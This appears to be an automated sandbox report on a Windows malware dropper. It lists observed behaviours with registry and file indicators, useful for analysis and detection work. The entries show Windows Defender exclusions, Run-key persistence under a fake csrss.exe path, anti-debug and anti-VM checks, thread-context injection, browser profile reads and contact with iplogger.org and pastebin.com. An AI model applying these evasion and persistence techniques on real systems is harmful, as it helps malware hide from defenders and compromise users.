Possible attempt to disable PatchGuard
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun156aa32cae4a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun156aa32cae4a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1500b8e65c1f53.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1500b8e65c1f53.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
System Binary Proxy Execution: Odbcconf
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\odbcconf.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\odbcconf.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Sun1585e1028b0.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun156aa32cae4a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1500b8e65c1f53.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1500b8e65c1f53.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1500b8e65c1f53.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1515dbfc0edab0.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 348 set thread context of 2020 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1507dd11d509.exe | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1507dd11d509.exe |
| PID 276 set thread context of 3048 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15a8461882.exe | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15a8461882.exe |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| File created | C:\Windows\Logs\CBS\CbsPersist_20241108103628.cab | C:\Windows\system32\makecab.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15e81af69f990d3a6.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15a8461882.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1507dd11d509.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15372e8db79ed3d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun150e9a93676ff.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun157e7a96e632.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\rss\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15b94526a807b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun156d9ca8467.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15635943177.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15c4c762b69ba5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15e81af69f990d3a6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\odbcconf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1507dd11d509.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1515dbfc0edab0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15132bf2c585337a0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15b94526a807b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-KHILQ.tmp\Sun15b94526a807b.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\odbcconf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun154ca5fada.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1524d92394d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-L27RA.tmp\Sun15b94526a807b.tmp | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{3D7EE991-9DBD-11EF-A641-FE6EB537C9A6} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
